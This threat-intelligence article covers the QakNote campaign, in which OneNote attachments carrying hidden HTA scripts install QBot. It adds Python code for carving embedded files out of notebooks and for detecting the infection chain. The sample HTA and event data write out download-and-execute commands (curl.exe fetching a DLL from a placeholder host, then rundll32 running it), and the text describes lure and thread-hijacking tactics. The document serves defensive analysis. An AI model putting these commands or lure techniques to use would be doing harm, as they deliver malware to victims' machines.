QakNote Campaign Leverages OneNote to Infect Victims with QBot

Qakbot, aka Qbot, Quackbot, or Pinkslipbot, has evolved from a banking trojan into a multi-purpose botnet capable of performing reconnaissance, moving laterally, stealing and exfiltrating data, and delivering malicious payloads. Since late January, QBot's operators have started experimenting with a new distribution method using OneNote files to infect systems. This new malware campaign has been dubbed QakNote.

What’s new?

Sophos researchers observed two parallel spam campaigns distributing malicious Microsoft OneNote attachments that carry an embedded HTML application (HTA file).
  • In one, threat actors send impersonal malspam with an embedded link to the weaponized .one file.
  • In the other, they use thread hijacking (also called thread injection): they take over existing email threads and send a reply-to-all message to the participants with a malicious OneNote notebook attached.
  • The subject matter of these messages varies; however, most attachments were named either ApplicationReject_#####(Jan31)[.]one or ComplaintCopy_#####(Feb01)[.]one.
  • Inside the notebook, threat actors place a fake "Double Click to View File" button or a similar call to action that supposedly downloads the document from the cloud. The graphic sits on top of the embedded HTA, so double-clicking the lure launches the script rather than opening a document.
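To triage a suspicious .one attachment without opening it, an analyst can carve the embedded files straight out of the notebook bytes. The following Python is an added example, not code from the article or from Sophos: it locates FileDataStoreObject records (the structure OneNote uses to store embedded files, identified by the header GUID {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} from Microsoft's MS-ONESTORE specification), extracts each payload and sniffs whether it looks like an HTA/script, a PE or an image. The "notebook" it runs on is a constructed byte blob that mimics the layout described above (a decoy image plus an HTA), not a real QakNote sample; the HTA text, host name and file names in it are assumptions.

```python
"""Carve and classify embedded files from a OneNote (.one) notebook.

Added example, not from the original article or from Sophos' research.
The sample notebook at the bottom is a constructed byte blob.
"""
import re
import struct
import uuid

# MS-ONESTORE FileDataStoreObject layout:
#   guidHeader (16) | cbLength (uint64 LE) | unused (4) | reserved (8) | FileData | guidFooter (16)
FDSO_HEADER = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
FDSO_FOOTER = uuid.UUID("{71FBA722-0F79-4A0B-BB13-899256426B24}").bytes_le
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8  # FileData starts 36 bytes after guidHeader


def extract_embedded_files(data: bytes) -> list[bytes]:
    """Return the FileData payload of every well-formed FileDataStoreObject in `data`."""
    payloads = []
    pos = data.find(FDSO_HEADER)
    while pos != -1:
        if pos + FDSO_DATA_OFFSET > len(data):   # header too close to EOF to carry a length
            break
        (cb_length,) = struct.unpack_from("<Q", data, pos + 16)
        start = pos + FDSO_DATA_OFFSET
        end = start + cb_length
        if end <= len(data):                      # skip truncated records instead of crashing
            payloads.append(data[start:end])
            pos = data.find(FDSO_HEADER, end)     # resume after the record we just consumed
        else:
            pos = data.find(FDSO_HEADER, pos + 16)
    return payloads


def classify(blob: bytes) -> str:
    """Cheap content sniff on the carved payload: PE, HTA/script, image or other."""
    head = blob[:4096].lower()
    if blob.startswith(b"MZ"):
        return "pe"
    if re.search(rb"<hta:application|<script|wscript\.shell|mshta", head):
        return "hta_or_script"
    if blob.startswith(b"\x89PNG") or blob.startswith(b"\xff\xd8"):
        return "image"
    return "other"


def triage(data: bytes) -> list[tuple[str, int]]:
    """(kind, size) for every embedded file, in file order."""
    return [(classify(b), len(b)) for b in extract_embedded_files(data)]


def build_fdso(payload: bytes) -> bytes:
    """Wrap `payload` in a FileDataStoreObject (used only to build the constructed sample)."""
    return (FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 4 + b"\x00" * 8
            + payload + FDSO_FOOTER)


# Constructed HTA mirroring the chain the article describes (curl.exe download to
# C:\ProgramData, then rundll32). The host name and file names are placeholders.
SAMPLE_HTA = rb"""<html><hta:application id="lure"/><script language="VBScript">
Set sh = CreateObject("WScript.Shell")
sh.Run "curl.exe -o C:\ProgramData\update.dll http://example.invalid/p", 0, True
sh.Run "rundll32.exe C:\ProgramData\update.dll,Wind", 0, False
</script></html>"""

# Constructed notebook-like blob: padding, a decoy PNG-like image (the fake button),
# more padding, then the embedded HTA.
SAMPLE_ONE = (b"\x00" * 64
              + build_fdso(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
              + b"\x00" * 16
              + build_fdso(SAMPLE_HTA))

if __name__ == "__main__":
    for kind, size in triage(SAMPLE_ONE):
        print(f"{kind:14s} {size:6d} bytes")
```

Running it on a real attachment is `triage(open("sample.one", "rb").read())`; anything reported as `hta_or_script` or `pe` inside a document that claims to hold a cloud file is worth a closer look before the user ever double-clicks the lure.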

Technical insights

If the user double-clicks the button, OneNote launches the embedded HTA file, which then retrieves the malware payload.
  • Once launched, the embedded HTA can execute commands on the local machine to download and install QBot.
  • Most of the .hta files contain identical script code and instructions for the rest of the attack.
  • The HTA script uses the legitimate curl.exe application to download a DLL file (the QBot payload) into the C:\ProgramData folder; the DLL is then executed with Rundll32[.]exe.
  • The QBot payload injects itself into the Windows Assistive Technology manager (AtBroker.exe) to conceal its presence and evade detection by AV tools running on the device.
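The chain above (OneNote spawning a script host, curl.exe writing a DLL into C:\ProgramData, rundll32 loading that DLL, and the payload reaching into AtBroker.exe) gives a defender four process-telemetry observables to key on. The following Python is an added example, not part of the article or of Sophos' research: it encodes each stage as a rule, runs them over a batch of constructed, simplified Sysmon-style process-create and process-access events, and reports when enough stages fire together. The event field names, file paths and host name are assumptions chosen for the example; the benign curl and rundll32 events at the end are there to show the rules stay quiet on ordinary use.

```python
"""Detect the QakNote execution chain in process telemetry.

Added example, not from the article or from Sophos. Events are constructed,
simplified Sysmon-style records; field names are assumptions for this demo.
"""
from dataclasses import dataclass
import re


@dataclass
class Event:
    kind: str            # "process_create" or "process_access"
    image: str           # Image of the created process, or SourceImage for an access
    parent: str = ""     # ParentImage (process_create only)
    cmdline: str = ""    # CommandLine (process_create only)
    target: str = ""     # TargetImage (process_access only)


OFFICE_APPS = {"onenote.exe", "onenotem.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
# A path under C:\ProgramData (any drive letter), stopping at whitespace, quotes or commas.
PROGRAMDATA = re.compile(r"[a-z]:\\programdata\\[^\s\"',]*", re.IGNORECASE)
# curl's output-file switch and the path that follows it.
CURL_OUTPUT = re.compile(r"(?:^|\s)(?:-o|--output)\s+\"?([^\s\"]+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(e: Event) -> bool:
    """Stage 1: OneNote (or another Office app) launching mshta/wscript/cmd/etc."""
    return (e.kind == "process_create" and basename(e.parent) in OFFICE_APPS
            and basename(e.image) in SCRIPT_HOSTS)


def curl_writes_dll_to_programdata(e: Event) -> bool:
    """Stage 2: curl.exe told to save a .dll under C:\\ProgramData."""
    if e.kind != "process_create" or basename(e.image) != "curl.exe":
        return False
    m = CURL_OUTPUT.search(e.cmdline)
    return bool(m) and m.group(1).lower().endswith(".dll") and bool(PROGRAMDATA.match(m.group(1)))


def rundll32_loads_from_programdata(e: Event) -> bool:
    """Stage 3: rundll32.exe executing a DLL that lives under C:\\ProgramData."""
    if e.kind != "process_create" or basename(e.image) != "rundll32.exe":
        return False
    m = PROGRAMDATA.search(e.cmdline)
    return bool(m) and m.group(0).lower().endswith(".dll")


def injection_into_atbroker(e: Event) -> bool:
    """Stage 4: a script host or rundll32 opening a handle to AtBroker.exe."""
    return (e.kind == "process_access" and basename(e.target) == "atbroker.exe"
            and basename(e.image) in SCRIPT_HOSTS | {"rundll32.exe", "regsvr32.exe"})


RULES = {
    "office_spawns_script_host": office_spawns_script_host,
    "curl_writes_dll_to_programdata": curl_writes_dll_to_programdata,
    "rundll32_loads_from_programdata": rundll32_loads_from_programdata,
    "injection_into_atbroker": injection_into_atbroker,
}


def evaluate(events: list[Event]) -> list[tuple[str, int]]:
    """(rule_name, event_index) for every rule that fires, in event order."""
    return [(name, i) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]


def chain_detected(events: list[Event], minimum: int = 3) -> bool:
    """Call it QakNote-like when at least `minimum` distinct stages are present."""
    return len({name for name, _ in evaluate(events)}) >= minimum


# Constructed events. The OneNote export path is simplified; the download host is a placeholder.
SAMPLE_EVENTS = [
    Event("process_create", r"C:\Windows\System32\mshta.exe",
          parent=r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
          cmdline=r'mshta.exe "C:\Users\bob\AppData\Local\Temp\OneNote\Open.hta"'),
    Event("process_create", r"C:\Windows\System32\curl.exe", parent=r"C:\Windows\System32\mshta.exe",
          cmdline=r"curl.exe -o C:\ProgramData\update.dll http://example.invalid/p"),
    Event("process_create", r"C:\Windows\System32\rundll32.exe", parent=r"C:\Windows\System32\mshta.exe",
          cmdline=r"rundll32.exe C:\ProgramData\update.dll,Wind"),
    Event("process_access", r"C:\Windows\System32\rundll32.exe", target=r"C:\Windows\System32\AtBroker.exe"),
    # Benign noise that must not fire: a user download and a normal Control Panel launch.
    Event("process_create", r"C:\Windows\System32\curl.exe", parent=r"C:\Windows\System32\cmd.exe",
          cmdline=r"curl.exe -o C:\Users\bob\Downloads\notes.zip https://example.invalid/notes.zip"),
    Event("process_create", r"C:\Windows\System32\rundll32.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=r"rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] event #{idx}: {SAMPLE_EVENTS[idx].cmdline or SAMPLE_EVENTS[idx].target}")
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
```

Requiring several stages before alerting is the design choice that matters here: curl.exe writing to ProgramData or rundll32 loading from it each occur in legitimate software deployments, but an Office parent, a download to ProgramData and a rundll32 load of that same location inside one session are far harder to explain away.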

Wrapping up

Since Microsoft began blocking macros by default in Office documents downloaded from the internet in July 2022, threat actors have been looking for new ways to execute code on targets' devices. QBot, first seen in the wild in 2007, is a prominent malware family, and other groups can adopt its distribution method in an automated and streamlined fashion. Users are therefore advised to heed the warnings and avoid opening suspicious attachments or links to prevent infection.
Cyware Publisher